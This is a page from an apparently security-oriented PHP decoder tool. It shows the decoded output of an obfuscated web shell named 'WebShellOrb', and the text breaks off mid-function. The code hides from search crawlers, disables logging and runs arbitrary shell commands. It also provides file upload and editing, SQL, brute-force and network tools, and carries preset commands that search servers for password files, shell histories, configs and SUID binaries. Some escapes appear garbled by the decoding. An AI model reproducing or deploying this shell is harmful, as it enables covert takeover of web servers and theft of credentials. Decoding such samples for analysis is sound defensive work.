Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php ${"\x47L\x4f\x42A\x4cS"}["\x6a\x65\x68n\x77\x6b\x76\x68q"] = "d\x..
Decoded Output download
<?php
${"GLOBALS"}["jehnwkvhq"] = "default_action";
${"GLOBALS"}["jbzeoab"] = "bind_port_p";
${"GLOBALS"}["rnphbwgqyad"] = "t";
${"GLOBALS"}["eelpcfsuym"] = "w";
${"GLOBALS"}["kmiihcqpanrs"] = "file";
${"GLOBALS"}["gletwnspjntd"] = "title";
${"GLOBALS"}["dncwbwlrbd"] = "tbls_res";
${"GLOBALS"}["xrdbnxfmvt"] = "value";
${"GLOBALS"}["txyjmywp"] = "table";
${"GLOBALS"}["amehtg"] = "columns";
${"GLOBALS"}["sdigtdgih"] = "head";
${"GLOBALS"}["lwqrio"] = "sql";
${"GLOBALS"}["lfljrdmc"] = "create";
${"GLOBALS"}["lhydmmywwn"] = "str";
${"GLOBALS"}["bopmwejgirf"] = "db";
${"GLOBALS"}["omanxfropl"] = "line";
${"GLOBALS"}["nnwtcnvv"] = "server";
${"GLOBALS"}["civkgkkc"] = "attempts";
${"GLOBALS"}["nscqaqn"] = "success";
${"GLOBALS"}["bdrlwjttk"] = "login";
${"GLOBALS"}["icduirvc"] = "pass";
${"GLOBALS"}["ymhnnp"] = "res";
${"GLOBALS"}["nhegyujkbg"] = "port";
${"GLOBALS"}["qelasgmoq"] = "ip";
${"GLOBALS"}["srhpuno"] = "len";
${"GLOBALS"}["rifohoju"] = "time";
${"GLOBALS"}["bgbndglw"] = "perms";
${"GLOBALS"}["tbrhqbi"] = "fp";
${"GLOBALS"}["gigsmqyowb"] = "paths";
${"GLOBALS"}["dyvthet"] = "stringTools";
${"GLOBALS"}["mwpoytmwus"] = "r";
${"GLOBALS"}["gayaio"] = "l";
${"GLOBALS"}["slzbugds"] = "b";
${"GLOBALS"}["cxfbyfxajt"] = "a";
${"GLOBALS"}["punnqnswy"] = "gr";
${"GLOBALS"}["zppzcsfgo"] = "ow";
${"GLOBALS"}["qanhuo"] = "dirContent";
${"GLOBALS"}["xzocqroestsp"] = "dirs";
${"GLOBALS"}["khtkbtbcp"] = "match";
${"GLOBALS"}["wxflrkghg"] = "sort";
${"GLOBALS"}["oocwabo"] = "key";
${"GLOBALS"}["xqjcyjffi"] = "iterator";
${"GLOBALS"}["aihxtguj"] = "h";
${"GLOBALS"}["smcbgcyi"] = "d";
${"GLOBALS"}["sbuwwkozt"] = "c";
${"GLOBALS"}["vxhdoihqlkd"] = "type";
${"GLOBALS"}["ecbcmiybue"] = "tmp";
${"GLOBALS"}["phgjytx"] = "danger";
${"GLOBALS"}["mercgmdwe"] = "temp";
${"GLOBALS"}["onmdrx"] = "n";
${"GLOBALS"}["yluxecll"] = "files";
${"GLOBALS"}["rbasqp"] = "filename";
${"GLOBALS"}["qubwkb"] = "dh";
${"GLOBALS"}["leuwumt"] = "dir";
${"GLOBALS"}["vwhnmvbzmuqd"] = "p";
${"GLOBALS"}["uopupgy"] = "s";
${"GLOBALS"}["sberlg"] = "f";
${"GLOBALS"}["fnkkdtgr"] = "in";
${"GLOBALS"}["qdurqmqjmbr"] = "out";
${"GLOBALS"}["brvjme"] = "is_writable";
${"GLOBALS"}["plyulhiuro"] = "freeSpace";
${"GLOBALS"}["cblwsfsrxdw"] = "drive";
${"GLOBALS"}["ofhwsmmm"] = "drives";
${"GLOBALS"}["vvdxmjbgec"] = "v";
${"GLOBALS"}["wwtfgcddf"] = "menu";
${"GLOBALS"}["fskqowyovpk"] = "m";
${"GLOBALS"}["bdmqwqvfqn"] = "item";
${"GLOBALS"}["mgvkxgcmofyr"] = "opt_charsets";
${"GLOBALS"}["ffswlhab"] = "path";
${"GLOBALS"}["rxgtddszwqnr"] = "j";
${"GLOBALS"}["clkuyojj"] = "i";
${"GLOBALS"}["qumrcez"] = "cwd_links";
${"GLOBALS"}["gkjyrzxng"] = "uid";
${"GLOBALS"}["hxhfbflhzlt"] = "user";
${"GLOBALS"}["uyrzfubjl"] = "group";
${"GLOBALS"}["elkyxmiyu"] = "gid";
${"GLOBALS"}["ccoxzyjv"] = "release";
${"GLOBALS"}["bxyoytprd"] = "explink";
${"GLOBALS"}["vgkonizq"] = "kernel";
${"GLOBALS"}["mtmcgbuxstj"] = "totalSpace";
${"GLOBALS"}["uolbyjcowuum"] = "aliases";
${"GLOBALS"}["rqlrvrqjdye"] = "cwd";
${"GLOBALS"}["ppyxsbssm"] = "home_cwd";
${"GLOBALS"}["cpxsnhfrvxnr"] = "safe_mode";
${"GLOBALS"}["tngplbofyfxj"] = "os";
$slswzwwiy = "os";
$qvuswnnljk = "cwd";
${"GLOBALS"}["oqvryxe"] = "k";
${"GLOBALS"}["egcnymujkiu"] = "array";
${"GLOBALS"}["dbdznjgxv"] = "userAgents";
${"GLOBALS"}["cdkparndoqp"] = "auth_pass";
${"GLOBALS"}["wqnrzv"] = "default_use_ajax";
${"GLOBALS"}["cnreqxxxyx"] = "color";
${"GLOBALS"}["vnvuep"] = "os";
error_reporting(0);
$rcnyvpgwp = "default_action";
${${"GLOBALS"}["cnreqxxxyx"]} = "#df5";
${$rcnyvpgwp} = "FilesMan";
${${"GLOBALS"}["wqnrzv"]} = true;
${"GLOBALS"}["hxwowixkcah"] = "disable_functions";
${"GLOBALS"}["oecyizwdg"] = "default_charset";
${${"GLOBALS"}["oecyizwdg"]} = "Windows-1251";
${${"GLOBALS"}["cdkparndoqp"]} = "";
if (!empty($_SERVER["HTTP_USER_AGENT"])) {
$funwst = "userAgents";
${$funwst} = array(
"Google",
"Slurp",
"MSNBot",
"ia_archiver",
"Yandex",
"Rambler"
);
if (preg_match("/" . implode("|", ${${"GLOBALS"}["dbdznjgxv"]}) . "/i", $_SERVER["HTTP_USER_AGENT"])) {
header("HTTP/1.0 404 Not Found");
exit;
}
}
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
$jkanbtmrlf = "auth_pass";
@set_time_limit(0);
$iqvdvclroyby = "aliases";
@define("WebShellOrb_VERSION", "2.6");
if (get_magic_quotes_gpc()) {
function WebShellOrbstripslashes($array)
{
${"GLOBALS"}["jdcuurkq"] = "array";
$ziszkiem = "array";
return is_array(${${"GLOBALS"}["egcnymujkiu"]}) ? array_map("WebShellOrbstripslashes", ${$ziszkiem}) : stripslashes(${${"GLOBALS"}["jdcuurkq"]});
}
$_POST = WebShellOrbstripslashes($_POST);
$_COOKIE = WebShellOrbstripslashes($_COOKIE);
}
function WebShellOrbLogin()
{
die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}
function WebShellOrbsetcookie($k, $v)
{
${"GLOBALS"}["inbcfdml"] = "k";
$gltqybwss = "v";
$_COOKIE[${${"GLOBALS"}["inbcfdml"]}] = ${$gltqybwss};
${"GLOBALS"}["liyrzggwi"] = "v";
setcookie(${${"GLOBALS"}["oqvryxe"]}, ${${"GLOBALS"}["liyrzggwi"]});
}
if (!empty(${$jkanbtmrlf})) {
$mewlffwp = "auth_pass";
${"GLOBALS"}["ccrrecjgmg"] = "auth_pass";
${"GLOBALS"}["uwlnxnqkvyx"] = "auth_pass";
if (isset($_POST["pass"]) && (md5($_POST["pass"]) == ${${"GLOBALS"}["uwlnxnqkvyx"]}))
WebShellOrbsetcookie(md5($_SERVER["HTTP_HOST"]), ${$mewlffwp});
if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"])]) || ($_COOKIE[md5($_SERVER["HTTP_HOST"])] != ${${"GLOBALS"}["ccrrecjgmg"]}))
WebShellOrbLogin();
}
if (strtolower(substr(PHP_OS, 0, 3)) == "win")
${${"GLOBALS"}["vnvuep"]} = "win";
else
${${"GLOBALS"}["tngplbofyfxj"]} = "nix";
${${"GLOBALS"}["cpxsnhfrvxnr"]} = @ini_get("safe_mode");
if (!${${"GLOBALS"}["cpxsnhfrvxnr"]})
error_reporting(0);
${${"GLOBALS"}["hxwowixkcah"]} = @ini_get("disable_functions");
${${"GLOBALS"}["ppyxsbssm"]} = @getcwd();
if (isset($_POST["c"]))
@chdir($_POST["c"]);
${${"GLOBALS"}["rqlrvrqjdye"]} = @getcwd();
if (${$slswzwwiy} == "win") {
${${"GLOBALS"}["ppyxsbssm"]} = str_replace("\", "/", ${${"GLOBALS"}["ppyxsbssm"]});
$sjfvibvmk = "cwd";
${$sjfvibvmk} = str_replace("\", "/", ${${"GLOBALS"}["rqlrvrqjdye"]});
}
${"GLOBALS"}["wmcgcguq"] = "os";
if (${$qvuswnnljk}[strlen(${${"GLOBALS"}["rqlrvrqjdye"]}) - 1] != "/")
${${"GLOBALS"}["rqlrvrqjdye"]} .= "/";
if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"]))
$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = (bool) ${${"GLOBALS"}["wqnrzv"]};
if (${${"GLOBALS"}["wmcgcguq"]} == "win")
${${"GLOBALS"}["uolbyjcowuum"]} = array(
"List Directory" => "dir",
"Find index.php in current dir" => "dir /s /w /b index.php",
"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
"Show active connections" => "netstat -an",
"Show running services" => "net start",
"User accounts" => "net user",
"Show computers" => "net view",
"ARP Table" => "arp -a",
"IP Configuration" => "ipconfig /all"
);
else
${$iqvdvclroyby} = array(
"List dir" => "ls -lha",
"list file attributes on a Linux second extended file system" => "lsattr -va",
"show opened ports" => "netstat -an | grep -i listen",
"process status" => "ps aux",
"Find" => "",
"find all suid" => "find / -type f -perm -04000 -ls",
"find suid in current dir" => "find . -type f -perm -04000 -ls",
"find all sgid" => "find / -type f -perm -02000 -ls",
"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
"find config.inc.php" => "find / -type f -name config.inc.php",
"find config*" => "find / -type f -name \"config*"",
"find config* in current dir" => "find . -type f -name \"config*"",
"find all writable folders and files" => "find / -perm -2 -ls",
"find all writable folders and files in current dir" => "find . -perm -2 -ls",
"find all service.pwd" => "find / -type f -name service.pwd",
"find service.pwd files in current dir" => "find . -type f -name service.pwd",
"find all .htpasswd" => "find / -type f -name .htpasswd",
"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
"find all .bash_history" => "find / -type f -name .bash_history",
"find .bash_history files in current dir" => "find . -type f -name .bash_history",
"find all .fetchmailrc" => "find / -type f -name .fetchmailrc",
"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
"Locate" => "",
"locate httpd.conf" => "locate httpd.conf",
"locate vhosts.conf" => "locate vhosts.conf",
"locate proftpd.conf" => "locate proftpd.conf",
"locate psybnc.conf" => "locate psybnc.conf",
"locate my.conf" => "locate my.conf",
"locate admin.php" => "locate admin.php",
"locate cfg.php" => "locate cfg.php",
"locate conf.php" => "locate conf.php",
"locate config.dat" => "locate config.dat",
"locate config.php" => "locate config.php",
"locate config.inc" => "locate config.inc",
"locate config.inc.php" => "locate config.inc.php",
"locate config.default.php" => "locate config.default.php",
"locate config*" => "locate config",
"locate .conf" => "locate '.conf'",
"locate .pwd" => "locate '.pwd'",
"locate .sql" => "locate '.sql'",
"locate .htpasswd" => "locate '.htpasswd'",
"locate .bash_history" => "locate '.bash_history'",
"locate .mysql_history" => "locate '.mysql_history'",
"locate .fetchmailrc" => "locate '.fetchmailrc'",
"locate backup" => "locate backup",
"locate dump" => "locate dump",
"locate priv" => "locate priv"
);
function WebShellOrbHeader()
{
${"GLOBALS"}["lfcdhxiqrjuc"] = "freeSpace";
$cvyfemar = "i";
$gigkkylcom = "v";
${"GLOBALS"}["rtzgviw"] = "item";
$jeuwvfj = "path";
$syynptc = "uid";
$unibgzq = "release";
${"GLOBALS"}["qhgnljws"] = "totalSpace";
if (empty($_POST["charset"]))
$_POST["charset"] = $GLOBALS["default_charset"];
${"GLOBALS"}["paallywki"] = "explink";
$unjshhsygx = "item";
${"GLOBALS"}["rrsayeov"] = "k";
${"GLOBALS"}["tlmqysbj"] = "user";
$mzcbhnv = "n";
global $color;
$ylknujmswar = "charsets";
$fnmpbhsrxkxs = "release";
echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST["charset"] . "'><title>" . $_SERVER["HTTP_HOST"] . " - WebShellOrb " . WebShellOrb_VERSION . "</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: $color !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
var c_ = '" . htmlspecialchars($GLOBALS["cwd"]) . "';
var a_ = '" . htmlspecialchars(@$_POST["a"]) . "'
var charset_ = '" . htmlspecialchars(@$_POST["charset"]) . "';
var p1_ = '" . ((strpos(@$_POST["p1"], "
") !== false) ? "" : htmlspecialchars($_POST["p1"], ENT_QUOTES)) . "';
var p2_ = '" . ((strpos(@$_POST["p2"], "
") !== false) ? "" : htmlspecialchars($_POST["p2"], ENT_QUOTES)) . "';
var p3_ = '" . ((strpos(@$_POST["p3"], "
") !== false) ? "" : htmlspecialchars($_POST["p3"], ENT_QUOTES)) . "';
var d = document;
function set(a,c,p1,p2,p3,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
//if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = 'ajax=true';
for(i=0;i<d.mf.elements.length;i++)
params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
sr('" . addslashes($_SERVER["REQUEST_URI"]) . "', params);
}
function sr(url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest();
else if (window.ActiveXObject)
req = new ActiveXObject('Microsoft.XMLHTTP');
if (req) {
req.onreadystatechange = processReqChange;
req.open('POST', url, true);
req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
req.send(params);
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
var reg = new RegExp("(\\d+)([\S\\s]*)\", 'm');
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
$xfernkifiv = "kernel";
${${"GLOBALS"}["lfcdhxiqrjuc"]} = @diskfreespace($GLOBALS["cwd"]);
${${"GLOBALS"}["mtmcgbuxstj"]} = @disk_total_space($GLOBALS["cwd"]);
${${"GLOBALS"}["qhgnljws"]} = ${${"GLOBALS"}["mtmcgbuxstj"]} ? ${${"GLOBALS"}["mtmcgbuxstj"]} : 1;
$wjslkgig = "charsets";
${$fnmpbhsrxkxs} = @php_uname("r");
${$xfernkifiv} = @php_uname("s");
${"GLOBALS"}["devrcywexce"] = "i";
${${"GLOBALS"}["paallywki"]} = "https://www.exploit-db.com/search?q=";
if (strpos("Linux", ${${"GLOBALS"}["vgkonizq"]}) !== false)
${${"GLOBALS"}["bxyoytprd"]} .= urlencode("Linux Kernel " . substr(${${"GLOBALS"}["ccoxzyjv"]}, 0, 6));
else
${${"GLOBALS"}["bxyoytprd"]} .= urlencode(${${"GLOBALS"}["vgkonizq"]} . " " . substr(${$unibgzq}, 0, 3));
$yuriqttm = "path";
$dapwvlq = "n";
${"GLOBALS"}["cdovfzfgp"] = "menu";
if (!function_exists("posix_getegid")) {
${"GLOBALS"}["jvxsiqqu"] = "uid";
$aiyfiiwq = "user";
${$aiyfiiwq} = @get_current_user();
${${"GLOBALS"}["jvxsiqqu"]} = @getmyuid();
${${"GLOBALS"}["elkyxmiyu"]} = @getmygid();
${${"GLOBALS"}["uyrzfubjl"]} = "?";
} else {
$hnryuak = "gid";
$lzwmbumx = "uid";
${$lzwmbumx} = @posix_getpwuid(posix_geteuid());
${$hnryuak} = @posix_getgrgid(posix_getegid());
${"GLOBALS"}["tufvwq"] = "gid";
${"GLOBALS"}["mejxibh"] = "gid";
${${"GLOBALS"}["hxhfbflhzlt"]} = ${${"GLOBALS"}["gkjyrzxng"]}["name"];
${${"GLOBALS"}["gkjyrzxng"]} = ${${"GLOBALS"}["gkjyrzxng"]}["uid"];
${${"GLOBALS"}["uyrzfubjl"]} = ${${"GLOBALS"}["elkyxmiyu"]}["name"];
${${"GLOBALS"}["tufvwq"]} = ${${"GLOBALS"}["mejxibh"]}["gid"];
}
${"GLOBALS"}["ykiemhno"] = "m";
${${"GLOBALS"}["qumrcez"]} = "";
${$yuriqttm} = explode("/", $GLOBALS["cwd"]);
$yxdvqicqjzi = "m";
${"GLOBALS"}["ietcukn"] = "cwd_links";
${$dapwvlq} = count(${$jeuwvfj});
for (${${"GLOBALS"}["devrcywexce"]} = 0; ${$cvyfemar} < ${$mzcbhnv} - 1; ${${"GLOBALS"}["clkuyojj"]}++) {
${"GLOBALS"}["urffjmdujbs"] = "cwd_links";
$nubocyjtuqn = "j";
${"GLOBALS"}["guamecwi"] = "j";
$iyjeuqvfrl = "cwd_links";
${${"GLOBALS"}["qumrcez"]} .= "<a href='#' onclick='g(\"FilesMan","";
${"GLOBALS"}["pzisplggic"] = "i";
for (${$nubocyjtuqn} = 0; ${${"GLOBALS"}["rxgtddszwqnr"]} <= ${${"GLOBALS"}["clkuyojj"]}; ${${"GLOBALS"}["rxgtddszwqnr"]}++)
${${"GLOBALS"}["urffjmdujbs"]} .= ${${"GLOBALS"}["ffswlhab"]}[${${"GLOBALS"}["guamecwi"]}] . "/";
${$iyjeuqvfrl} .= "\")'>" . ${${"GLOBALS"}["ffswlhab"]}[${${"GLOBALS"}["pzisplggic"]}] . "/</a>";
}
${$ylknujmswar} = array(
"UTF-8",
"Windows-1251",
"KOI8-R",
"KOI8-U",
"cp866"
);
${${"GLOBALS"}["mgvkxgcmofyr"]} = "";
$amhhbx = "freeSpace";
foreach (${$wjslkgig} as ${${"GLOBALS"}["rtzgviw"]})
${${"GLOBALS"}["mgvkxgcmofyr"]} .= "<option value=\"" . ${$unjshhsygx} . "" " . ($_POST["charset"] == ${${"GLOBALS"}["bdmqwqvfqn"]} ? "selected" : "") . ">" . ${${"GLOBALS"}["bdmqwqvfqn"]} . "</option>";
${${"GLOBALS"}["fskqowyovpk"]} = array(
"Sec. Info" => "SecInfo",
"Files" => "FilesMan",
"Console" => "Console",
"Sql" => "Sql",
"Php" => "Php",
"String tools" => "StringTools",
"Bruteforce" => "Bruteforce",
"Network" => "Network"
);
$fqtoyg = "drives";
if (!empty($GLOBALS["auth_pass"]))
${${"GLOBALS"}["fskqowyovpk"]}["Logout"] = "Logout";
${$yxdvqicqjzi}["Self remove"] = "SelfRemove";
${${"GLOBALS"}["wwtfgcddf"]} = "";
foreach (${${"GLOBALS"}["fskqowyovpk"]} as ${${"GLOBALS"}["oqvryxe"]} => ${${"GLOBALS"}["vvdxmjbgec"]})
${${"GLOBALS"}["cdovfzfgp"]} .= "<th width="" . (int) (100 / count(${${"GLOBALS"}["ykiemhno"]})) . "%">[ <a href="#" onclick=\"g('" . ${$gigkkylcom} . "',null,'','','')\">" . ${${"GLOBALS"}["rrsayeov"]} . "</a> ]</th>";
${${"GLOBALS"}["ofhwsmmm"]} = "";
if ($GLOBALS["os"] == "win") {
${"GLOBALS"}["bfeplaaxg"] = "drive";
foreach (range("c", "z") as ${${"GLOBALS"}["bfeplaaxg"]}) {
${"GLOBALS"}["jilogpg"] = "drive";
if (is_dir(${${"GLOBALS"}["cblwsfsrxdw"]} . ":\"))
${${"GLOBALS"}["ofhwsmmm"]} .= "<a href="#\" onclick=\"g('FilesMan','" . ${${"GLOBALS"}["cblwsfsrxdw"]} . ":/')">[ " . ${${"GLOBALS"}["jilogpg"]} . " ]</a> ";
}
}
echo "<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:" . ($GLOBALS["os"] == "win" ? "<br>Drives:" : "") . "</span></td>" . "<td><nobr>" . substr(@php_uname(), 0, 120) . " </nobr><br>" . ${$syynptc} . " ( " . ${${"GLOBALS"}["tlmqysbj"]} . " ) <span>Group:</span> " . ${${"GLOBALS"}["elkyxmiyu"]} . " ( " . ${${"GLOBALS"}["uyrzfubjl"]} . " )<br>" . @phpversion() . " <span>Safe mode:</span> " . ($GLOBALS["safe_mode"] ? "<font color=red>ON</font>" : "<font color=green><b>OFF</b></font>") . " <a href=# onclick="g('Php',null,'','info')\">[ phpinfo ]</a> <span>Datetime:</span> " . date("Y-m-d H:i:s") . "<br>" . WebShellOrbViewSize(${${"GLOBALS"}["mtmcgbuxstj"]}) . " <span>Free:</span> " . WebShellOrbViewSize(${$amhhbx}) . " (" . (int) (${${"GLOBALS"}["plyulhiuro"]} / ${${"GLOBALS"}["mtmcgbuxstj"]} * 100) . "%)<br>" . ${${"GLOBALS"}["ietcukn"]} . " " . WebShellOrbPermsColor($GLOBALS["cwd"]) . " <a href=# onclick=\"g('FilesMan','" . $GLOBALS["home_cwd"] . "','','','')">[ home ]</a><br>" . ${$fqtoyg} . "</td>" . "<td width=1 align=right><nobr><select onchange=\"g(null,null,null,null,null,this.value)\"><optgroup label="Page charset\">" . ${${"GLOBALS"}["mgvkxgcmofyr"]} . "</optgroup></select><br><span>Server IP:</span><br>" . @$_SERVER["SERVER_ADDR"] . "<br><span>Client IP:</span><br>" . $_SERVER["REMOTE_ADDR"] . "</nobr></td></tr></table>" . "<table style="border-top:2px solid #333;\" cellpadding=3 cellspacing=0 width=100%><tr>" . ${${"GLOBALS"}["wwtfgcddf"]} . "</tr></table><div style="margin:5">";
}
function WebShellOrbFooter()
{
${${"GLOBALS"}["brvjme"]} = is_writable($GLOBALS["cwd"]) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>";
echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
<tr>
<td><form onsubmit='g(null,this.c.value,\"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=submit value='>>'></form></td>
<td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit="g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
<td><form method='post' ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMAn'>
<input type=hidden name=c value='" . $GLOBALS["cwd"] . "'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : "") . "'>
<span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
</tr></table></div></body></html>";
}
if (!function_exists("posix_getpwuid") && (strpos($GLOBALS["disable_functions"], "posix_getpwuid") === false)) {
function posix_getpwuid($p)
{
return false;
}
}
if (!function_exists("posix_getgrgid") && (strpos($GLOBALS["disable_functions"], "posix_getgrgid") === false)) {
function posix_getgrgid($p)
{
return false;
}
}
function WebShellOrbEx($in)
{
${${"GLOBALS"}["qdurqmqjmbr"]} = "";
$ulvxazrw = "f";
if (function_exists("exec")) {
${"GLOBALS"}["puwualher"] = "out";
${"GLOBALS"}["wvnfyvnwgbn"] = "out";
${"GLOBALS"}["yqwwmdce"] = "in";
@exec(${${"GLOBALS"}["yqwwmdce"]}, ${${"GLOBALS"}["qdurqmqjmbr"]});
${${"GLOBALS"}["puwualher"]} = @join("
", ${${"GLOBALS"}["wvnfyvnwgbn"]});
} elseif (function_exists("passthru")) {
${"GLOBALS"}["ghqwlszjfk"] = "out";
ob_start();
${"GLOBALS"}["toraaeaxl"] = "in";
@passthru(${${"GLOBALS"}["toraaeaxl"]});
${${"GLOBALS"}["ghqwlszjfk"]} = ob_get_clean();
} elseif (function_exists("system")) {
${"GLOBALS"}["matymxx"] = "in";
${"GLOBALS"}["vjtbwkqix"] = "out";
ob_start();
@system(${${"GLOBALS"}["matymxx"]});
${${"GLOBALS"}["vjtbwkqix"]} = ob_get_clean();
} elseif (function_exists("shell_exec")) {
${"GLOBALS"}["npcgacfoo"] = "in";
${"GLOBALS"}["djodnntmrmsi"] = "out";
${${"GLOBALS"}["djodnntmrmsi"]} = shell_exec(${${"GLOBALS"}["npcgacfoo"]});
} elseif (is_resource(${$ulvxazrw} = @popen(${${"GLOBALS"}["fnkkdtgr"]}, "r"))) {
${"GLOBALS"}["rghikhavtcg"] = "f";
${${"GLOBALS"}["qdurqmqjmbr"]} = "";
while (!@feof(${${"GLOBALS"}["sberlg"]}))
${${"GLOBALS"}["qdurqmqjmbr"]} .= fread(${${"GLOBALS"}["rghikhavtcg"]}, 1024);
$iemsnbyuveay = "f";
pclose(${$iemsnbyuveay});
}
return ${${"GLOBALS"}["qdurqmqjmbr"]};
}
function WebShellOrbViewSize($s)
{
${"GLOBALS"}["gimekbfm"] = "s";
${"GLOBALS"}["cbmexkhxicy"] = "s";
$dqglmpbjtwd = "s";
$vamszp = "s";
$jwevteetyqc = "s";
$uebsygttsee = "s";
${"GLOBALS"}["nmpwumxsjgpa"] = "s";
if (is_int(${${"GLOBALS"}["nmpwumxsjgpa"]}))
${$vamszp} = sprintf("%u", ${$dqglmpbjtwd});
$rsztkxvkbp = "s";
if (${${"GLOBALS"}["uopupgy"]} >= 1073741824)
return sprintf("%1.2f", ${${"GLOBALS"}["uopupgy"]} / 1073741824) . " GB";
elseif (${$uebsygttsee} >= 1048576)
return sprintf("%1.2f", ${$jwevteetyqc} / 1048576) . " MB";
elseif (${${"GLOBALS"}["gimekbfm"]} >= 1024)
return sprintf("%1.2f", ${${"GLOBALS"}["cbmexkhxicy"]} / 1024) . " KB";
else
return ${$rsztkxvkbp} . " B";
}
function WebShellOrbPerms($p)
{
$qwyrtxgnisf = "p";
$lreavxykf = "i";
$ctwfzevrci = "p";
${"GLOBALS"}["qtdsyeg"] = "p";
$mhcxeci = "i";
$auktcgubws = "p";
$alkqtmvu = "p";
${"GLOBALS"}["nhlvkvrl"] = "i";
$ilolonrsko = "p";
$vlkybhpqjn = "p";
${"GLOBALS"}["idxhruzeutti"] = "p";
${"GLOBALS"}["kyhbiltfi"] = "p";
${"GLOBALS"}["ohjadiupdto"] = "i";
$qkybts = "p";
$iwcqbfpgngg = "p";
${"GLOBALS"}["olqfmkengz"] = "p";
$jupethhvkj = "p";
if ((${${"GLOBALS"}["vwhnmvbzmuqd"]} & 0xC000) == 0xC000)
${${"GLOBALS"}["clkuyojj"]} = "s";
elseif ((${$auktcgubws} & 0xA000) == 0xA000)
${$lreavxykf} = "l";
elseif ((${$alkqtmvu} & 0x8000) == 0x8000)
${${"GLOBALS"}["clkuyojj"]} = "-";
elseif ((${${"GLOBALS"}["qtdsyeg"]} & 0x6000) == 0x6000)
${${"GLOBALS"}["clkuyojj"]} = "b";
elseif ((${${"GLOBALS"}["vwhnmvbzmuqd"]} & 0x4000) == 0x4000)
${${"GLOBALS"}["nhlvkvrl"]} = "d";
elseif ((${$ctwfzevrci} & 0x2000) == 0x2000)
${${"GLOBALS"}["clkuyojj"]} = "c";
elseif ((${$vlkybhpqjn} & 0x1000) == 0x1000)
${$mhcxeci} = "p";
else
${${"GLOBALS"}["clkuyojj"]} = "u";
${${"GLOBALS"}["clkuyojj"]} .= ((${${"GLOBALS"}["kyhbiltfi"]} & 0x0100) ? "r" : "-");
${${"GLOBALS"}["clkuyojj"]} .= ((${${"GLOBALS"}["vwhnmvbzmuqd"]} & 0x0080) ? "w" : "-");
${"GLOBALS"}["yxcnjhn"] = "i";
